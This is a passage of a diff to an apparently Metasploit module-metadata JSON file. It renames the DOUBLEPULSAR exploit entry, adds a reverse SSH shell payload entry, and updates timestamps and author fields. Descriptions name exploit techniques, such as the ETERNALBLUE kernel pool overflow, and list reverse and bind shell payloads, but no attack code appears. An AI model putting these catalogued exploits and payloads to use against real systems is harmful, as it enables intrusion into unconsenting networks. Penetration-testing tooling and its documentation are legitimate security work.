      "Yokogawa CENTUM CS 3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/scada/yokogawa_bkhodeq_bof",
@@ -138780,78 +139971,6 @@
    },
    "needs_cleanup": null
  },
-  "exploit_windows/smb/doublepulsar_rce": {
-    "name": "DOUBLEPULSAR Payload Execution and Neutralization",
-    "fullname": "exploit/windows/smb/doublepulsar_rce",
-    "aliases": [
-
-    ],
-    "rank": 500,
-    "disclosure_date": "2017-04-14",
-    "type": "exploit",
-    "author": [
-      "Equation Group",
-      "Shadow Brokers",
-      "zerosum0x0",
-      "Luke Jennings",
-      "wvu <wvu@metasploit.com>",
-      "Jacob Robles"
-    ],
-    "description": "This module executes a Metasploit payload against the Equation Group's\n        DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n        While this module primarily performs code execution against the implant,\n        the \"Neutralize implant\" target allows you to disable the implant.",
-    "references": [
-      "MSB-MS17-010",
-      "CVE-2017-0143",
-      "CVE-2017-0144",
-      "CVE-2017-0145",
-      "CVE-2017-0146",
-      "CVE-2017-0147",
-      "CVE-2017-0148",
-      "URL-https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html",
-      "URL-https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/",
-      "URL-https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/",
-      "URL-https://github.com/countercept/doublepulsar-detection-script",
-      "URL-https://github.com/countercept/doublepulsar-c2-traffic-decryptor",
-      "URL-https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1"
-    ],
-    "platform": "Windows",
-    "arch": "x64",
-    "rport": 445,
-    "autofilter_ports": [
-      139,
-      445
-    ],
-    "autofilter_services": [
-      "netbios-ssn",
-      "microsoft-ds"
-    ],
-    "targets": [
-      "Execute payload",
-      "Neutralize implant"
-    ],
-    "mod_time": "2020-01-22 16:37:36 +0000",
-    "path": "/modules/exploits/windows/smb/doublepulsar_rce.rb",
-    "is_install_path": true,
-    "ref_name": "windows/smb/doublepulsar_rce",
-    "check": true,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "AKA": [
-        "DOUBLEPULSAR"
-      ],
-      "RelatedModules": [
-        "auxiliary/scanner/smb/smb_ms17_010",
-        "exploit/windows/smb/ms17_010_eternalblue"
-      ],
-      "Stability": [
-        "crash-os-down"
-      ],
-      "Reliability": [
-        "repeatable-session"
-      ]
-    },
-    "needs_cleanup": null
-  },
  "exploit_windows/smb/generic_smb_dll_injection": {
    "name": "Generic DLL Injection From Shared Resource",
    "fullname": "exploit/windows/smb/generic_smb_dll_injection",
@@ -139874,7 +140993,7 @@
      "Shadow Brokers",
      "thelightcosine"
    ],
-    "description": "This module is a port of the Equation Group ETERNALBLUE exploit, part of\n        the FuzzBunch toolkit released by Shadow Brokers.\n\n        There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size\n        is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a\n        DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow\n        is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later\n        completed in srvnet!SrvNetWskReceiveComplete.\n\n        This exploit, like the original may not trigger 100% of the time, and should be\n        run continuously until triggered. It seems like the pool will get hot streaks\n        and need a cool down period before the shells rain in again.\n\n        The module will attempt to use Anonymous login, by default, to authenticate to perform the\n        exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use\n        those instead.\n\n        On some systems, this module may cause system instability and crashes, such as a BSOD or\n        a reboot. This may be more likely with some payloads.",
+    "description": "This module is a port of the Equation Group ETERNALBLUE exploit, part of\n          the FuzzBunch toolkit released by Shadow Brokers.\n\n          There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size\n          is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a\n          DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow\n          is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later\n          completed in srvnet!SrvNetWskReceiveComplete.\n\n          This exploit, like the original may not trigger 100% of the time, and should be\n          run continuously until triggered. It seems like the pool will get hot streaks\n          and need a cool down period before the shells rain in again.\n\n          The module will attempt to use Anonymous login, by default, to authenticate to perform the\n          exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use\n          those instead.\n\n          On some systems, this module may cause system instability and crashes, such as a BSOD or\n          a reboot. This may be more likely with some payloads.",
    "references": [
      "MSB-MS17-010",
      "CVE-2017-0143",
@@ -139897,7 +141016,7 @@
    "targets": [
      "Windows 7 and Server 2008 R2 (x64) All Service Packs"
    ],
-    "mod_time": "2019-10-30 22:20:36 +0000",
+    "mod_time": "2020-03-09 09:22:01 +0000",
    "path": "/modules/exploits/windows/smb/ms17_010_eternalblue.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms17_010_eternalblue",
@@ -140205,6 +141324,78 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/smb/smb_doublepulsar_rce": {
+    "name": "SMB DOUBLEPULSAR Remote Code Execution",
+    "fullname": "exploit/windows/smb/smb_doublepulsar_rce",
+    "aliases": [
+      "exploit/windows/smb/doublepulsar_rce"
+    ],
+    "rank": 500,
+    "disclosure_date": "2017-04-14",
+    "type": "exploit",
+    "author": [
+      "Equation Group",
+      "Shadow Brokers",
+      "zerosum0x0",
+      "Luke Jennings",
+      "wvu <wvu@metasploit.com>",
+      "Jacob Robles"
+    ],
+    "description": "This module executes a Metasploit payload against the Equation Group's\n        DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n        While this module primarily performs code execution against the implant,\n        the \"Neutralize implant\" target allows you to disable the implant.",
+    "references": [
+      "MSB-MS17-010",
+      "CVE-2017-0143",
+      "CVE-2017-0144",
+      "CVE-2017-0145",
+      "CVE-2017-0146",
+      "CVE-2017-0147",
+      "CVE-2017-0148",
+      "URL-https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html",
+      "URL-https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/",
+      "URL-https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/",
+      "URL-https://github.com/countercept/doublepulsar-detection-script",
+      "URL-https://github.com/countercept/doublepulsar-c2-traffic-decryptor",
+      "URL-https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1"
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": 445,
+    "autofilter_ports": [
+      139,
+      445
+    ],
+    "autofilter_services": [
+      "netbios-ssn",
+      "microsoft-ds"
+    ],
+    "targets": [
+      "Execute payload (x64)",
+      "Neutralize implant"
+    ],
+    "mod_time": "2020-02-03 11:19:20 +0000",
+    "path": "/modules/exploits/windows/smb/smb_doublepulsar_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/smb/smb_doublepulsar_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "DOUBLEPULSAR"
+      ],
+      "RelatedModules": [
+        "auxiliary/scanner/smb/smb_ms17_010",
+        "exploit/windows/smb/ms17_010_eternalblue"
+      ],
+      "Stability": [
+        "crash-os-down"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_windows/smb/smb_relay": {
    "name": "MS08-068 Microsoft Windows SMB Relay Code Execution",
    "fullname": "exploit/windows/smb/smb_relay",
@@ -141018,7 +142209,7 @@
    "author": [
      "MC <mc@metasploit.com>"
    ],
-    "description": "This module exploits a stack buffer overflow in GoodTech Systems Telnet Server\n        versions prior to 5.0.7. By sending an overly long string, an attacker can\n        overwrite the buffer and control program execution.",
+    "description": "This module exploits a stack buffer overflow in GoodTech Systems Telnet Server\n          versions prior to 5.0.7. By sending an overly long string, an attacker can\n          overwrite the buffer and control program execution.",
    "references": [
      "CVE-2005-0768",
      "OSVDB-14806",
@@ -141037,7 +142228,7 @@
      "Windows 2000 Pro English All",
      "Windows XP Pro SP0/SP1 English"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-03-05 14:48:37 +0000",
    "path": "/modules/exploits/windows/telnet/goodtech_telnet.rb",
    "is_install_path": true,
    "ref_name": "windows/telnet/goodtech_telnet",
@@ -142698,7 +143889,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/aarch64/meterpreter_reverse_http",
@@ -142733,7 +143924,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/aarch64/meterpreter_reverse_https",
@@ -142768,7 +143959,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/aarch64/meterpreter_reverse_tcp",
@@ -142836,7 +144027,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_http",
@@ -142871,7 +144062,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_https",
@@ -142906,7 +144097,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_tcp",
@@ -144078,7 +145269,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-01-03 18:43:51 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_busybox_telnetd.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_busybox_telnetd",
@@ -144111,7 +145302,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_inetd.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_inetd",
@@ -144180,7 +145371,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-01-14 17:34:47 +0000",
+    "mod_time": "2020-02-16 12:11:28 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_lua.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_lua",
@@ -144215,7 +145406,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_netcat.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_netcat",
@@ -144248,7 +145439,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_netcat_gaping",
@@ -144281,7 +145472,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_netcat_gaping_ipv6",
@@ -144348,7 +145539,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_perl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_perl",
@@ -144382,7 +145573,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_perl_ipv6",
@@ -144403,7 +145594,7 @@
    "disclosure_date": null,
    "type": "payload",
    "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "Continually listen for a connection and spawn a command shell via R",
    "references": [
@@ -144415,7 +145606,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-08-28 05:30:30 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_r.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_r",
@@ -144448,7 +145639,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_ruby.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_ruby",
@@ -144481,7 +145672,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_ruby_ipv6",
@@ -144514,7 +145705,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-08-15 18:10:44 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_socat_udp.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_socat_udp",
@@ -144614,7 +145805,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/generic.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/generic",
@@ -144746,7 +145937,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse",
@@ -144814,7 +146005,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-07-10 18:34:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_bash.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_bash",
@@ -144835,7 +146026,7 @@
    "disclosure_date": null,
    "type": "payload",
    "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "Creates an interactive shell via mkfifo and telnet.\n        This method works on Debian and other systems compiled\n        without /dev/tcp support. This module uses the '-z'\n        option included on some systems to encrypt using SSL.",
    "references": [
@@ -144847,7 +146038,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-05-15 20:50:30 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_bash_telnet_ssl",
@@ -144881,7 +146072,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-24 16:33:44 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_bash_udp.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_bash_udp",
@@ -144983,7 +146174,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_lua.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_lua",
@@ -145051,7 +146242,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-08-23 18:00:02 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_netcat.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_netcat",
@@ -145084,7 +146275,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-08-23 18:00:02 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_netcat_gaping",
@@ -145150,7 +146341,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_openssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_openssl",
@@ -145183,7 +146374,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_perl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_perl",
@@ -145204,7 +146395,7 @@
    "disclosure_date": null,
    "type": "payload",
    "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "Creates an interactive shell via perl, uses SSL",
    "references": [
@@ -145216,7 +146407,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-21 09:17:51 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_perl_ssl",
@@ -145237,7 +146428,7 @@
    "disclosure_date": null,
    "type": "payload",
    "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "Creates an interactive shell via php, uses SSL",
    "references": [
@@ -145249,7 +146440,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-19 15:49:46 +0000",
+    "mod_time": "2020-02-21 09:17:51 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_php_ssl",
@@ -145282,7 +146473,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_python.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_python",
@@ -145303,7 +146494,7 @@
    "disclosure_date": null,
    "type": "payload",
    "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "Creates an interactive shell via python, uses SSL, encodes with base64 by design.",
    "references": [
@@ -145315,7 +146506,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_python_ssl",
@@ -145336,7 +146527,7 @@
    "disclosure_date": null,
    "type": "payload",
    "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "Connect back and create a command shell via R",
    "references": [
@@ -145348,7 +146539,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-08-28 05:30:30 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_r.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_r",
@@ -145381,7 +146572,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_ruby.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_ruby",
@@ -145402,7 +146593,7 @@
    "disclosure_date": null,
    "type": "payload",
    "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "Connect back and create a command shell via Ruby, uses SSL",
    "references": [
@@ -145414,7 +146605,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_ruby_ssl",
@@ -145447,7 +146638,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-08-15 18:10:44 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_socat_udp.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_socat_udp",
@@ -145458,6 +146649,40 @@
    },
    "needs_cleanup": false
  },
+  "payload_cmd/unix/reverse_ssh": {
+    "name": "Unix Command Shell, Reverse TCP SSH",
+    "fullname": "payload/cmd/unix/reverse_ssh",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "RageLtMan <rageltman@sempervictus>",
+      "hirura"
+    ],
+    "description": "Connect back and create a command shell via SSH",
+    "references": [
+
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-02-18 15:21:46 +0000",
+    "path": "/modules/payloads/singles/cmd/unix/reverse_ssh.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/unix/reverse_ssh",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "payload_cmd/unix/reverse_ssl_double_telnet": {
    "name": "Unix Command Shell, Double Reverse TCP SSL (telnet)",
    "fullname": "payload/cmd/unix/reverse_ssl_double_telnet",
@@ -145469,7 +146694,7 @@
    "type": "payload",
    "author": [
      "hdm <x@hdm.io>",
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "Creates an interactive shell through two inbound connections, encrypts using SSL via \"-z\" option",
    "references": [
@@ -145481,7 +146706,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-21 09:17:51 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_ssl_double_telnet",
@@ -145987,7 +147212,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-23 19:23:02 +0000",
    "path": "/modules/payloads/singles/cmd/windows/reverse_powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/reverse_powershell",
@@ -146662,7 +147887,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-24 05:40:02 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_http",
@@ -146697,7 +147922,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-24 05:40:02 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_https",
@@ -146732,7 +147957,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-24 05:40:02 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_tcp",
@@ -146833,7 +148058,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_http",
@@ -146868,7 +148093,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_https",
@@ -146903,7 +148128,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_tcp",
@@ -147106,7 +148331,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_http",
@@ -147141,7 +148366,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_https",
@@ -147176,7 +148401,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_tcp",
@@ -147345,7 +148570,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_http",
@@ -147380,7 +148605,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_https",
@@ -147415,7 +148640,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_tcp",
@@ -147519,7 +148744,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-24 05:40:02 +0000",
